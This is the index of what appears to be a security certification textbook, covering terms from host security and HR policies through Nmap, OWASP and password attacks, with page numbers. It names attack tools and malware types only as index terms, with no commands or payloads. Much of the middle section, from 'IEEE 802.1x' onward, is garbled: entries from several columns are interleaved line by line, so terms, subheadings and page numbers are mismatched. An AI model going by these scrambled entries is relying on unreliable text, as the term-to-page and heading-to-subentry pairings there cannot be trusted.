  secure areas, 548-549
  secure data destruction, 552-553
host hardware, 411
host-related intrusion detection systems (HIDS), 272
host security solutions
  embedded system security implications
    communication considerations, 333-334
    constraints of, 331-332
    facility automation, 336-337
    firmware code control, 339
    industrial control systems, 334-335
    Internet of Things (IoT), 335-336
    logic controllers, 332
    medical devices, 338
    multifunction printers (MFPs), 337
    network segmentation, 338
    vehicles and drones, 338
    Voice over IP (VoIP), 337
    wrappers, 339
  endpoint security
    antivirus response, 329
    baseline configuration and registry setting, 326
    endpoint protection, 327-328
    hardening systems, 325-326
    next-generation endpoint protection, 328-329
    patch management, 326-327
  guidelines for implementing, 341
  secure firmware, implementing
    boot integrity, 319-320
    disk encryption, 320-321
    end of life (EOL), 322-323
    end of service life (EOSL), 322-323
    hardware root of trust (RoT), 318-319
    organizational security agreements, 323
    third-party risk management, 322
    USB and flash drive security, 321-322
HOSTS files, 286
hot aisle/cold aisle arrangement, 551
HOTP (HMAC-based One-Time Password Algorithm), 168-169
hot plug PSU, 517
hot site, 532-533
hotspots, 357-358
hot storage, 422
HR policies. see human resources (HR) policies
HSM (hardware security module), 165
HTML5 VPN, 310
HTTP access logs, 470
HTTP methods, 372-373
HttpOnly attributes, 384
HTTPS (hypertext transfer protocol secure), 292
HTTP Strict Transport Security (HSTS), 385
human-machine interfaces (HMIs), 334
human resources (HR) policies
  account policies
    access policies, 191-192
    account attributes, 191
    account audits, 194
    account lockout and disablement, 196-197
    account password policy settings, 192-193
    account permissions, 195
    account restrictions, 193-194
    usage audits, 195-196

Index | I-17

  administrator credential policies, 185
  background checks and onboarding policies, 181
  conduct policy, 208-209
  credential management policies, 183-184
  device accounts credential policies, 186-187
  incident response (IR), 458
  offboarding policies, 183
  operation, 181
  personnel policies for privilege management, 182-183
  recruitment, 181
  terminations/separation, 181
  training technique diversity, 210-211
  user and role-based training, 209-210
hybrid password attacks, 160
hybrid warfare, 82
hypertext transfer protocol secure (HTTPS), 292
hypervisor-based virtual firewalls, 265
hypervisor/virtual machine monitor (VMM), 411-412

I
I2P, 25
IAM. see identity and access management (IAM)
IBM
  Active Directory Rights Management Services (RMS), 450
  X-Force Exchange, 27
ICMP (Internet Control Message Protocol), 36-37
ICV (Integrity Check Value), 305
ID badges, 546
idempotence, 431
identification of incidents, 456-457, 465, 466
identity and access management (IAM)
  accounting, 148-149
  application security, 419
  authentication, 148-149
  authorization, 148-149
  background checks and onboarding policies, 181
  identification, 148-149
  operation, 181
  recruitment, 181
  secrets management, 419-420
  terminations/separation, 181
identity and account management controls
  account policies
    access policies, 191-192
    account attributes, 191
    account audits, 194
    account lockout and disablement, 196-197
    account password policy settings, 192-193
    account permissions, 195
    account restrictions, 193-194
    usage audits, 195-196
  administrator/root accounts
    administrator credential policies, 185
    default security groups, 185
    generic administrator account management, 185
  authorization solutions
    attribute-based access control (ABAC), 201
    directory services, 202-203
    discretionary access control (DAC), 199
    federation and attestation, 203-204
    file system permissions, 200-201
    mandatory access control (MAC), 201
    Open Authorization (OAuth) protocols, 205-206
    Open ID Connect (OIDC), 206
    role-based access control (RBAC), 199
    rule-based access control, 201-202
    security assertions markup language (SAML), 204-205
  background checks and onboarding policies, 181-182
  guidelines for implementing, 213
  identity management control types
    certificates and smart cards, 180
    identity provider (IdP), 180-181
    tokens, 180
  offboarding policies, 183
  personnel policies
    conduct policy, 208-209
    training technique diversity, 210-211
    user and role-based training, 209-210
  personnel policies for privilege management, 182-183
  privilege access management, 187
  secure shell keys, 187
  security account types and credential management
    guest accounts, 183-184
    policies for personnel, 183
    standard users, 183
    security group-based privileges, 184
    service accounts, 185-186
    shared/generic/device accounts and credentials, 186-187
    third-party credentials, 187
identity fraud, 77
identity management control types
  certificates and smart cards, 180
  identity provider (IdP), 180-181
  tokens, 180
identity provider (IdP), 180-181, 203-204
identity theft, 53, 443-444
IdentTrust, 127
IdP (identity provider), 180-181, 203-204
IDS (intrusion detection system), 268-269
IEC, 11

IEEE 802.1x port-based NAC disaster recovery plans, information life cycle
(PNAC), 166 462-463 management, 438-439
IKE (Internet Key Exchange), forensic procedures, 463 information security
307-308, 308 guidelines for, 482 benchmarks, 12-13
image backups, 525-526 identification of incidents, Cloud frameworks, 11-12
IMAP4 (Internet Message Access 465-466 competencies, 3-4
Protocol v4), 297 incident response plan (IRP), cybersecurity framework, 3
IMAPS (secure IMAP), 297 458-459 information security
iMessage, 360 incident response process, business units
impact assessment, 442 456-457 DevSecOps, 5-6
impersonation, 75-76 mitigation controls SOC, 5
Imperva, 273 adversarial artificial ISO, 11
Implicit TLS (FTPS), 296 intelligence, 480 regulations, standards, and
impossible travel time/risky content filter legislation, 13-14
login policy, 194 configuration changes, roles and responsibilities
improper input handling, 367 477-478 Chief Information Security
in-band connection, 310 endpoint configuration Officer (CISO), 4
incident containment changes, 478-479 Information Systems
isolation-based containment, eradication and Security Officer (ISSO), 4
475-476 recovery, 476 secure configuration guides
segmentation-based firewall configuration application servers, 13
containment, 476 changes, 476-477 network appliance
incident eradication and incident containment, platform, 12-13
recovery, 476 475-476 operating systems (OS),
incident response (IR) security orchestration, 12-13
business continuity plan automation, and vendor-specific guides,
(BCP), 463 response (SOAR), 479 12-13
communication plan, 458 MITRE ATT&CK, 460-461 web server applications, 13
continuity of operation playbook/runbook, 459, 479 security controls
planning (COOP), 463 retention policy, 463 compensating controls, 10
cyber incident response simulations, 462 deterrent controls, 10
team (CIRT), 457-458 stakeholder management, 458 functional types, 9, 10
cyber kill chain attack tabletop exercises, 461-462 managerial security
framework, 459-460 walkthrough exercises, 462 control, 8-10, 9
data sources incident response plan (IRP), operational security
application log files, 458-459 control, 8-10, 9
470-471 incident response process, physical controls, 9, 10
authentication logs, 470 456-457 technical security
metadata, 471-472 incineration data destruction, 552 controls, 8-10, 9
network data sources, incremental backups, 524-525 security roles, CIA Triad, 2
472-473 indicator of compromise (IoC), information security business
network log files, 469 28-29, 277 units
security and information Indoor Positioning System (IPS), DevSecOps, 5-6
event management 350-351 SOC, 5
(SIEM), 466-469 industrial camouflage, 541 Information Sharing and
system and security industrial control systems (ICSs), Analysis Centers (ISACs), threat
logs, 469 334-335 intelligence providers, 27
vulnerability scan InfiniBand, 520 Information Systems Security
outputs, 470 influence campaigns, 82 Officer (ISSO), roles and
Diamond Model of Intrusion information assurance, security responsibilities, 4
Analysis, 461 controls, 8-10 Information Technology
Infrastructure (ITIL), 530-531

informed consent, 14 internal controls, service intrusion prevention system


infrared connection methods, 359 organization control (SOC2), 12 (IPS), 270
infrastructure as a service (IaaS), internal threat intrusive (active) vulnerability
409, 410 actor/agent, 19 scanner, 60
infrastructure as code (IaC), 431 insider threats, 21-22 invoice scams, 77
Infrastructure as Code concepts malicious, 19 Invoke-Command, 395
application programming risk management, 501 Invoke-Expression, 395
interfaces (APIs), 430 internal vs external disasters, 511 Invoke-WMIMethod, 395
edge computing, 432-433 International Electrotechnical IoCs. see indicator of
fog computing, 432-433 Commission (IEC), 11 compromise (IoC)
infrastructure as code International Organization for IP. see internet protocol (IP)
(IaC), 431 Standardization (ISO), 11 IP Flow Information Export
serverless architecture, Internet Control Message (IPFIX), 473
430-431 Protocol (ICMP), 36-37 IPS (intrusion prevention
service integration, 429-430 Internet Edge, 216 system), 270
software-defined networking internet/guest zones, 220 IP scanners, network
(SDN), 431-432 internet header, 471-472 reconnaissance tools, 38
software-defined visibility Internet Key Exchange (IKE), IPSec. see Internet Protocol
(SDV), 432 307-308 Security (IPSec)
ingress traffic filtering, 256 Internet Message Access iptables, 258-259
inherent risk, 504 Protocol v4 (IMAP4), 297 IP theft, 444
initialization vector (IV), 100, 115 Internet of Things (IoT), 335-336 IPv6, impacting premise
Initiative for Open internet protocol (IP) networks, 224
Authentication (OATH), 168 addresses, weak network IR blaster, 359
input validation, 383 configurations, 52 IRC (internet relay chat), 87
insider threats, 21-22 filtering, 256 iris scan, 174
inSSIDer, 244 routing and switching IR sensor, 359
instance awareness, 421 protocols, 219 ISACs, 27
Instant Secure Erase (ISE), 554 schema, 531 ISO. see International
intangible assets, 510 Internet Protocol Security (IPSec) Organization for Standardization
internal threats, 19 Authentication Header (ISO)
integer overflow, 368 (AH), 305 ISOC best practice guide, data
Integrity Check Value (ICV), 305 Encapsulation Security acquisition, 490
integrity measurement, 401 Payload (ESP), 305 isolation-based containment,
integrity of evidence, 494 Layer 2 Tunneling Protocol 475-476
intellectual property (IP), (L2TP), 308 ISSO, 4
440-441, 501-502 Security Associations (SA), IV (initialization vector), 100, 115
Intelligence-Driven Computer 307-308 IV attacks, 245
Network Defense (Lockheed transport mode, 306
Martin), 459 tunnel mode, 306 J
intelligence fusion, 64-65 internet relay chat (IRC), 87
jailbreaking, 353-354
Intel Software Guard Extensions, interpreted language, Python, 392
jamming attacks, 245
448 intranet (private network)
JavaScript, 397
intent, of threat actors, 19 zones, 220
JavaScript Object Notation
intentional threat, 18 intrusion analysis
(JSON), 421
interactive logon, 154 cyber kill chain attack
jitter, 252
intercepting proxy, 261 framework, 459-460
job rotation, 182
interconnection security Diamond Model, 461
journalctl, 469
agreement (ISA), 445 MITRE ATT&CK, 460-461
Juice Shop, 13
interface endpoints, 424 intrusion detection system (IDS),
jump servers, 310-311
Intermediate CA (hierarchical), 268-269
Juniper, JunOS, 266
127-128

K ciphers, 98 Windows authentication,


Diffie-Hellman (D-H) key 154-155
KALI, network reconnaissance
agreements, 107-108 KNOX, 346
tools, 41
digital envelopes, 105-106 Kubernetes cloud orchestration
KDC (Key Distribution Center),
entropy and weak keys, platform, 430
155-156
114-115
Kerberos
authentication
ephemeral session keys, L
107-108
authentication and non- L2TP (Layer 2 Tunneling
key agreements vs. key
repudiation, 312 Protocol), 308
exchange, 107
Authentication Service, latency, 252
key Exchange, 105-106
155-156 lateral movement, pen test
Key Signing Key, 288
Key Distribution Center attack life cycle, 70
public and private key pairs,
(KDC), 155-156 lateral movement/insider
100-101, 311
secure network protocols, attack, 394
public zone signing, 287
288 layer 2 forwarding, 218
secret key, 99
Ticket Granting Service, layer 2 tunneling protocol
secure shell keys, 187
155-156 (L2TP), 308
smart cards, 164
authorization, 156-157 layer 3 forwarding, 218
symmetric cipher, 100
kernel vulnerabilities, 50 layer 4 load balancer, 249
Trusted Platform Module
Key Distribution Center (KDC), layer 7 load balancer, 249
(TPM), 164-165
155-156 layered security, 533-534
unchangeable asymmetric
key encryption key (KEK), 321 LDAP Secure (LDAPS), 288-289
private key, 318
key Exchange, 105-106 least privilege, principle, 182
USB key, 164
key exchange/agreement legacy systems
Key Signing Key, 288
algorithm, 108 platform vulnerabilities, 51
key stretching, cryptographic
keylogger, 85-86 risk management, 502
attacks, 117
key management legal department, incident
Key Usage attribute, 132
centralized key management, response (IR), 457-458
kill chain, 459
137 legal hold, 485
kill switch, 349-350
decentralized key legislation
Kismet, 244
management, 137 horizontal (consumer-
KMIP. see Key Management
devices for specific, cross-sector), 13-14
Interoperability Protocol (KMIP)
hardware security vertical (sector-specific), 13-14
knowledge-based authentication
module (HSM), 165 lessons learned phase, 457
authentication management,
smart cards, 164 lighting, site security, 541
161-162
Trusted Platform Module Lightweight Directory Access
brute force attacks, 160
(TPM), 164-165 Protocol (LDAP), 202, 288-289, 379
Challenge Handshake
USB key, 164 Linux
Authentication Protocol
escrow, 138 authentication process,
(CHAP), 158
key recovery, 138 pluggable authentication
dictionary attacks, 160
key renewal, 138 module (PAM), 155
hybrid password attacks, 160
life cycle of, 137 Bourne Again Shell (Bash)
Kerberos authentication,
M-of-N control, 138 malicious indicators, 396
155-156
see also certificate and key cat command, 278
Kerberos authorization,
management dcfldd, 493
156-157
Key Management Debian OpenSSL, 114-115
MS-CHAP, 158
Interoperability Protocol (KMIP), dig, 41
password attacks, 159-160
318-319 Dirty COW, 50, 368
Password Authentication
keys execution control, 394
Protocol (PAP), 157-158
certificate and key file integrity monitoring
password crackers, 161
management, life cycle of, 137 (FIM), 272
rainbow table attacks, 160

file system permissions, 200 operational technology (OT) long term retention, 522
head and tail commands, 278 attacks, 248 lookalike domains, 79
ifconfig, 36 persistence, 250 looping statements
iptables, 258-259 quality of service (QoS), 252 PowerShell, 393
journalctl, 469 scheduling, 250 Python, 391-392
KALI, 41 site resiliency, 532 scripting, 390
logger command, 278-279 source IP affinity, 250 loop prevention
memdump, 492 local replication, 422 Bridge Protocol Data Unit
mtr, 37 Local Security Authority (LSA), (BPDU) Guard, 230
Netcat, 46-47 Windows authentication, 154 broadcast storm prevention,
OpenSSL local service accounts, 185 229
certificate and key location services Spanning Tree Protocol
management, 142 geofencing and camera/ (STP), 228
certificate signing request microphone enforcement, 351 low observable characteristics
(CSR), 142 geolocation, 350-351 (LOC) attack, fileless malware, 85
root certificates, 141-142 GPS tagging, 352 LSA (Local Security Authority), 154
ParrotOS, 41 location-based LTE Machine Type
reverse shell, 396 authentication, 152 Communication (LTE-M), 333
root accounts, 184-185 location-based policies, 193 LulzSec, 20
SEAndroid, 347 Lockheed Martin whitepaper, lunchtime attacks, 77
Secure Erase (SE), 554 Intelligence-Driven Computer
Secure Shell (SSH), 311 Network Defense, 459 M
Security-Enhanced Linux, 347 lockout policy, 349
MAC
Security Module (LSM), 394 log files
address table, 228
service accounts, 186 application log files, 470-471
cloning, 227
SSH commands, 313 authentication logs, 470
filtering, 230
tcpdump, 42-43 network log files, 469
flooding, 228-229
traceroute, 37 system and security logs, 469
limiting, 230
Ubuntu vulnerability scan outputs, 470
network interface hardware
RedHat Linux container, logger command, 278-279
address, 218-219
413-414 logging platforms
MAC (mandatory access
root accounts, 185 journalctl, 469
control), 201
Volatility Framework, 492 NXlog, 469
MAC (message authentication
live acquisition, 492, 493 rsyslog, 468
code), 109, 113
live off the land techniques syslog, 468
McAfee
fileless malware, 85 syslog-ng, 468-469
data loss prevention (DLP), 450
remote access Trojans (RATs), logic bombs, 89-90, 416
SkyHigh Networks, 426
86-87 logic controllers for embedded
machine/computer
load balancers systems, 332
certificates, 134
amplification attack, 247-248 logic statements, 391-392, 393
machine learning (ML)
application attacks, 247-248 logon, 150
techniques, 31
clustering, 250-251 logs
macros, 396-397
distributed denial of service aggregation/banding
macro virus, 83
(DDoS), 247, 248-249 technique, 277
“Magic Quadrant” reports, 328
DNS amplification attack, 248 collection
magnetic hard disk, 553
layer 4 load balancer, 249 agent-based, 276
mailbox access, 296
layer 7 load balancer, 249 listener/collector, 276
mail delivery agent (MDA), 472
network appliances, 217-218 sensor, 276
Mail Exchanger (MX) record, 296
network redundancy, 518 syslog, 276
mail transfer, 296
Network Time Protocol (NTP), log reviews, 61-62
mail transfer server, 217
247-248 monitoring services, 275
mail user agent (MUA), 472
Long Term Evolution (LTE), 333

malicious code indicators Obad Android Trojan mean time to repair (MTTR), 511
Bourne Again Shell (Bash) malware, 359 mean time to respond
malicious indicators, 396 process analysis, 90-91 (MTTR), 479
credential dumping, 394 VM escaping, 414-415 measured boot, 319-320
lateral movement/insider Malware Information Sharing measurement systems analysis
attack, 394 Project (MISP), 27 (MSA), 323
macros, 396-397 MAM (mobile device media sanitization, 552-553
man-in-the-browser (MitB) management), 345 medical devices, 338
attack, 397 Managed Google Play, 352 memdump, 492
persistence malicious managed power distribution memorandum of understanding
code, 395 units (PDUs), 517 (MOU), 323
PowerShell malicious Managed Security Services memory leak, 368-369
indicators, 395 Provider (MSSP), 411 memory management, 385
Python malicious indicators, management information base memory resident, viruses, 83
396 (MIB), 289 memory resident malware
shellcode, 394 management plane, 432 fileless malware, 84-85
Visual Basic for Applications managerial security control, 8 worms, 84-85
(VBA), 396-397 mandatory access control (MAC) Memoryze, 492
malicious external threats, 19 authorization solutions, 201 Message Analyzer tool, 472
malicious internal threats, 19 execution control, 394 message authentication code
malicious process, memory Security-Enhanced Linux, 347 (MAC), 109, 113
resident virus, 83 mandatory vacation, 183 message digest algorithm
malware Mandiant’s APT1, 20 (MDA), 97-98
advance tools against, 329 man-in-the-browser (MitB) metadata
guidelines for, 93 attack, 397 email metadata, 471-472
malware-based attacks man-in-the-middle attack (MitM) file metadata, 471
bluetooth connection application log files, 471 mobile phone, 472
methods, 358 certificate pinning, 140 web metadata, 471
DLL injection, 369 cryptographic attacks, 116-117 Metasploit, 45-46, 91
domain generation algorithm DNS poisoning, 286 MFA (multifactor authentication),
(DGA), 91 firmware over the air 151
fast-flux, 91 updates, 361 MIB (management information
indicators of, 90 high latency indicating, 37 base), 289
malware classifications integrity and resiliency of micro segmentation, 225
adware, 85 data, 113 microservices, 429-430
backdoors, 86-87 mutual authentication Microsoft
cookies, 85 preventing, 157 Active Directory (AD), 288
crypto-malware, 89 near field communications Always-on VPN, 308-309
fileless malware, 84-85 (NFC), 360 App-V, 413-414
keylogger, 85-86 unsecure protocols, 52 Azure
logic bombs, 89-90 mantraps, 543 Functions, 41
payload, 82 marketing team, incident Information Protection,
potentially unwanted response (IR), 458 440, 450
programs (PUPs), 82, 83 maximum tolerable downtime SQL Database, 409
ransomware, 88-89 (MTD), 508-509, 516 Virtual Machines, 409
remote access Trojans MDA (message digest Baseline Security Analyzer
(RATs), 86-87 algorithm), 97-98 (MBSA), 326
rootkits, 87-88 MDM. see mobile device Challenge Handshake
spyware, 85 management (MDM) Authentication Protocol
Trojans, 82, 83 mean time between failures (CHAP), 158
viruses, 82, 83, 83 (MTBF), 510 Cloud App Security, 426
worms, 80, 82, 84-85 mean time to failure (MTTF), 510 DNS services, 287

Edge, 470 application allow and remote wipe/ kill switch,


Hyper-V, 412 block lists, 478-479 349-350
Information Rights quarantine, 479 rooting, 353-354
Management (IRM), 450 eradication and recovery, 476 mobile payment services,
Intune, 345, 346, 347, 348, firewall configuration 359-360
352, 357 changes, 476-477 mobile phone, metadata, 472
lifecycle policy, 322 incident containment, 475-476 modes of operations
Office 365, 409, 449-450 security orchestration, Additional Data (AEAD)
Post Office Protocol v3 automation, and response mode, 109
(POP3S), 297 (SOAR), 479 authenticated encryption, 109
Remote Connectivity MitM. see man-in-the-middle chosen ciphertext attack, 109
Analyzer, 472 attack (MitM) cipher suites, 108
Remote Desktop, 310, 413 Mitre, Common Vulnerabilities cryptographic concepts, 106
SDL, 383 and Exposures (CVE), 30 digital envelopes and key
Secure Sockets Tunneling MITRE Corporation ATT&CK exchange, 105-106
Protocol (SSTP), 304 Framework, 460-461 digital signatures, 104-105
Security Compliance mobile access control systems message authentication code
Manager, 326 context-aware (MAC), 109
System Center Configuration authentication, 349 perfect forward secrecy,
Manager (SCCM), 327 screen lock, 349 107-108
System Center products, 38 smartphone authentication, ModSecurity, web application
third-party risk management, 348-349 firewalls, 273
322 mobile device deployment modules
Visual Basic for Applications models PowerShell, 393
(VBA), 396-397 Bring Your Own Device Python, 392
Windows Server CA, 127 (BYOD), 344 M-of-N control, 138
microwave radio connection Choose Your Own Device moisture detection sensors, 550
methods (CYOD), 344 monitoring services
point-to-multipoint (P2M), 362 Corporate Owned, Business logs, 275
point-to-point (P2P), 361-362 Only (COBO), 344 network monitors, 275
mine, logic bombs, 89 Corporate Owned, Personally- packet capture, 275
mirror port, 269-270 Enabled (COPE), 344 motion detection alarm, 544
MISP, 27 virtualization, 344 motivation, of threat actors, 19
mission essential functions mobile device management MS-CHAP, 158
(MEF) (MDM) multi-cloud architecture, 408
maximum tolerable application management, multifactor authentication
downtime (MTD), 508-509 352-353 (MFA), 151, 420
recovery point objective carrier unlocking, 353-354 multifunction printers
(RPO), 509-510 content filter configuration (MFPs), 337
recovery time objective changes, 478 multimedia message service
(RTO), 509 content management, 353 (MMS), 360
risk management, 500 enterprise mobility multipartite, 83
work recovery time (WRT), 509 management (EMM), 345 multiparty risks, 501
mitigation controls external media, 350 multipath, disk redundancy, 519
adversarial artificial full device encryption, 350 multiple context virtual
intelligence, 480 jailbreaking, 353-354 firewalls, 265
content filter configuration location services, 350-352 multi-tenant cloud, 408
changes, 477-478 mobile access control mutual authentication, 156-157
endpoint configuration systems, 348-349 MX (Mail Exchanger) record, 296
changes mobile device deployment
models, 344

N destination NAT/port network directory lists, 288-289


forwarding, 264-265 network functions virtualization
NAC. see network access control
overloaded NAT/Network (NFV), 432
(NAC)
Address Port Translation network interface card (NIC)
Namespaces, 420
(NAPT)/Port Address teaming, 518
NAPT (overloaded NAT/Network
Translation (PAT), 264 network interface hardware
Address Port Translation)/Port
static and dynamic source (MAC) address, 218-219
Address Translation (PAT), 264
NAT, 264 network layer (layer 3), 425
narrowband-IoT (NB-IoT), 333
network agents, 449 network log files, 469
NAT. see network address
network appliance platform, network mapping, 227
translation (NAT)
secure configuration guides, 12-13 network monitors, 275
NAT gateway, 423
network appliances network operating system (NOS)
National Checklist Program
domain name system (DNS), firewall, 260
(NCP), 13
217-218 network protocols. see secure
National Institute of Standards
firewalls, 217-218 network protocols
and Technology (NIST). see NIST
load balancers, 217-218 network reconnaissance tools
national laws, 14
routers, 217-218 Address Resolution Protocol
nation state actors, 21
switches, 217-218 (ARP) cache, 37
nation-state attacks, influence
wireless access points (WAP), curl, 42
campaigns, 82
217-218 dnsenum, 41
native cloud application-aware
network architecture ifconfig, 36
firewalls, 425
business workflows, 217 ipconfig, 36
NAXSI, 273
east-west traffic Nessus, 42
ND (neighbor discovery), 38
considerations, 224 netstat, 40-41
NDA (non-disclosure
IPv6, 224 Nmap Security Scanner
agreements), 182
network appliances, 217-218 IP scanners, 38
near field communications
network segmentation, service discovery, 39-40
(NFC), 359-360
219-220 nslookup/dig, 40-41
neighbor discovery (ND), 38
network segregation, 220 ping, 36-37
Nessus
network topology and zones route and traceroute, 37-38
network reconnaissance
demilitarized zone (DMZ), scanless, 41
tools, 42
221-223 theHarvester, 41
plug-ins, 59
screened hosts, 223 network redundancy
web management
zone networks, 220-224 load balancers, 518
interface, 60
routing and switching network interface card (NIC)
Netcat, testing connectivity, 46-47
protocols, 218-219 teaming, 518
Netflix, 430
weakness of, 216 switching and routing, 518
netflow/IPFIX, 473
zero trust, 224-225 networks, connectivity, route
Netskope, 427
network attached storage and traceroute, 37
netstat, network reconnaissance
(NAS), 527 network security appliances
tools, 40-41
network-based intrusion firewalls
network access control (NAC)
detection systems (NIDS), 268-269 access control lists (ACL),
hardware root of trust
network-based intrusion 262-263
(RoT), 318
prevention systems, 270 firewall implementation,
port-based NAC (PNAC),
network data acquisition, 495 259-260
231-232
network data sources network address
posture assessment, 231
bandwidth monitor, 473 translation (NAT), 263-265
unified endpoint
netflow/IPFIX, 473 open-source vs.
management (UEM), 345
protocol analyzer output, proprietary, 266
network address allocation,
472-473 packet filtering
284-285
sFlow, 473 firewalls, 256
network address translation (NAT)

stateful inspection host-related intrusion nfdump/nfsen, 473


firewalls, 257-259 detection systems (HIDS), 272 NGFW (next-generation
virtual firewalls, 265 intrusion detection system firewalls), 271-272
guidelines for implementing, (IDS), 268-269 NIDS (network-based intrusion
281 intrusion prevention system detection systems), 268-269
network security monitoring (IPS), 270 Nikto scanner, 59
anomaly-based detection, mirror port, 269-270 NIST
271 network-based intrusion Computer Security Incident
behavioral-based detection systems (NIDS), Handling Guide, 456-457
detection, 271 268-269 cybersecurity framework
content filter, 272 network-based intrusion (CSF), 3, 10-11
host-related intrusion prevention systems, 270 information security roles, 4
detection systems next-generation firewalls ISO 31K, 501
(HIDS), 272 (NGFW), 271-272 National Checklist Program
intrusion detection signature-based detection, (NCP), 13
system (IDS), 268-269 270-271 National Vulnerability
intrusion prevention test access port (TAP), 269-270 Database, 59
system (IPS), 270 web application firewalls, 273 risk management framework
mirror port, 269-270 network segmentation, (RMF), 11
network-based intrusion 219-220, 338 Risk Management
detection systems (NIDS), network segregation, 220 Framework (RMF), 501
268-269 network service accounts, 186 Special publications, 11
network-based intrusion Network Time Protocol (NTP), Technical Guide to
prevention systems, 270 247, 289 Information Security Testing
next-generation firewalls network topology and zones and Assessment, 57
(NGFW), 271-272 demilitarized zone (DMZ), see also Special Publications
signature-based 221-223 (NIST)
detection, 270-271 screened hosts, 223 Nmap Security Scanner
test access port (TAP), zone networks, 221 IP scanners, 38
269-270 network traffic, 487 neighbor discovery (ND), 38
web application firewalls, network traffic analysis (NTA), 271 OS fingerprinting, 39-40
273 network vulnerability scanner penetration tests, 69
proxy servers and gateways intrusive vs. non-intrusive, 60 port scan, 38
forward proxy servers, security assessments, 58 service and version
261-262 network vulnerability tests detection, 39-40
reverse proxy servers, 262 (NVTs), 59 service discovery, 39-40
security information and New-Object, 395 Nohl, Karsten, 321
event management (SIEM) New-Service, 395 noise detection alarm, 544
analysis and report next-generation endpoint nonce, 115
review, 277-278 protection non-credential scans, 61
file manipulation, 278-279 endpoint detection and non-disclosure agreements
grep command, 279 response (EDR), 328-329 (NDA)
log collection, 276-277 next-generation firewall onboarding policies, 182
monitoring services, 275 integration, 329 organizational security
regular expression (regex) next-generation firewall agreements, 323
syntax, 279 integration, 329 personally identifiable
network security monitoring next-generation firewalls information (PII), 441
anomaly-based detection, 271 (NGFW), 271-272 service level agreement
behavioral-based next-generation secure web (SLA), 445
detection, 271 gateway, 427 non-intrusive (passive)
content filter, 272 NFC. see near field vulnerability scanner, 60
communications (NFC) non-persistent environment, 528

non-persistent (session) secure transmission of hping, 44-45


cookies, 374 credentials, 181 OpenSSH, 311
non-repudiation, 2, 111-112 training/policies, 181 OpenSSL, 141
non-transparent proxy, 261 one-time password (OTP) OpenStack, 409
nonvolatile storage media, 493 HMAC-based One-Time OpenVAS scan engine, 58, 59
normalization, string inputs, 383 Password Algorithm (HOTP), OpenVPN, 303-304
NOS (network operating system) 168-169 Open Vulnerability and
firewall, 260 Time-Based One-Time Assessment Language (OVAL),
nslookup/dig, network Password Algorithm 63
reconnaissance tools, 40-41 (TOTP), 169 Open Web Application Security
NTA (network traffic analysis), 271 onion routing, 25 Project (OWASP), 13
NT LAN Manager (NTLM) online backups, 526 operational security control, 8
authentication, 154 online CAs, 128 operational technology (OT)
NTLM (NT LAN Manager) Online Certificate Status attacks, 248
authentication, 154 Protocol (OCSP), 139-140 operational technology (OT)
NTP (Network Time Protocol), online password attacks, 159 network, 333
247, 289 on-path attack, 227 opportunistic threats, 19
null pointer dereference, 368 On the Go (OTG), 360 Oracle Cloud, 409
NVTs (network vulnerability OOB. see out-of-band (OOB) Oracle Database, 409
tests), 59 Opal Storage Specification, 321 Oracle VirtualBox, 411
NXlog, 469 open authentication orchestration, cloud service
HMAC-based One-Time integration, 430
O Password Algorithm (HOTP), order of restoration, 527-528
168-169 order of volatility, 490
OASIS CTI framework, 29-30
Initiative for Open organizational security
OATH (Initiative for Open
Authentication (OATH), 168 exploitation frameworks,
Authentication), 168
secure wireless 45-46
OAuth (Open Authorization)
infrastructure, 239-240 neighbor discovery (ND), 38
protocols, 205-206
Time-Based One-Time Netcat, 46-47
Obad Android Trojan
Password Algorithm network reconnaissance
malware, 359
(TOTP), 169 tools
obfuscation/camouflage code,
Open Authorization (OAuth) Address Resolution
386-387
protocols, 205-206 Protocol (ARP) cache, 37
obfuscation techniques, integrity
Open ID Connect (OIDC), 206 curl, 42
and resiliency of data, 113
open permissions, weak host dnsenum, 41
OCSP (Online Certificate Status
configurations, 52 ifconfig, 36
Protocol), 139-140
open ports and services, weak ipconfig, 36
OCSP responder, 139-140
network configurations, 52 IP scanners and Nmap, 38
offboarding policies, 183
Open Shortest Path First Nessus, 42
offline backups, 526
(OSPF), 219 netstat, 40-41
offline CAs, 128
open-source firewalls, 266 nslookup/dig, 40-41
offline password attacks, 159-160
open source intelligence (OSINT) ping, 36-37
offsite storage, 526
AT&T Security, 27 route and traceroute,
Off-the-Record (OTR), 458
active reconnaissance, 69 37-38
OIDC (Open ID Connect), 206
Malware Information Sharing scanless, 41
O.MG cable, 321
Project (MISP), 27 service discovery and
Onboard Diagnostics (OBD-II)
Spamhaus, 28 Nmap, 39-40
module, 338
theHarvester, 41 theHarvester, 41
onboarding policies
VirusTotal, 28 packet analysis, 43-44
asset allocation, 181
open-source spoofing tool packet capture, 42
non-disclosure agreements
denial of service (DoS), 45
(NDA), 182

  packet injection and replay, 44-45
  protocol analysis, 42-43
  tcpdump, 42-43
  traffic analysis, 43-44
organizational security agreements, 323
OS (operating systems), 50
OS-based execution control, 393-394
OSI la, 258
OSI Layer 4 (transport layer), 257-258
OSI Layer 7 (application layer), 258
OSINT (Open Source Intelligence), 27, 28, 41, 69
OSPF (Open Shortest Path First), 219
OSSIM SIEM, 276
OT (operational technology) attacks, 248
OTP. see one-time password (OTP)
out-of-band (OOB)
  communication, 465
  management, 310
  mechanisms, 170
outputting encoding, 383-384
outsource code development, third-party risks, 55
OVAL (Open Vulnerability and Assessment Language), 63
overflow vulnerabilities
  buffer overflow, 367
  integer overflow, 368
overloaded NAT/Network Address Port Translation (NAPT)/Port Address Translation (PAT), 264
over-the-air (OTA), 361
overwriting, 553
OWASP (Open Web Application Security Project)
  buffer overflow, 367
  regulations, 13
  Software Assurance Maturity Model, 383
  Web Application Security Risks, 387
ownership factor, 150

P

P7B format, 141
PAC (Protected Access Credential), 243
packet analysis
  defined, 42
  Wireshark, 43-44
packet capture, 275
packet filtering firewalls
  access control lists (ACL), 256
  stateless operations, 256
packet injection and replay
  hping, 44-45
  tcpreplay, 45
packet sniffer, 69
Pacu, exploitation frameworks, 46
pagefile, 492-493
PAIN. see Privacy, Authentication, Integrity, Non-Repudiation (PAIN)
PAKE (Password Authenticated Key Exchange), 238-239
Palo Alto PAN-OS, 266
PAM (pluggable authentication module), 155
PAM (privileged access management), 202
PAP (Password Authentication Protocol), 157-158
paper document destruction, 552-553
Parallels Workstation, 411
parameters, 390
ParrotOS, network reconnaissance tools, 41
passive (non-intrusive) vulnerability scanner, 60
passive reconnaissance, 69-70
passphrase, 150
pass the hash (PtH) attack, 369-370
passwords
  crackers, 161
  key, 162
  manager
    password key, 162
    password vault, 162
  password attacks
    brute force attacks, 160
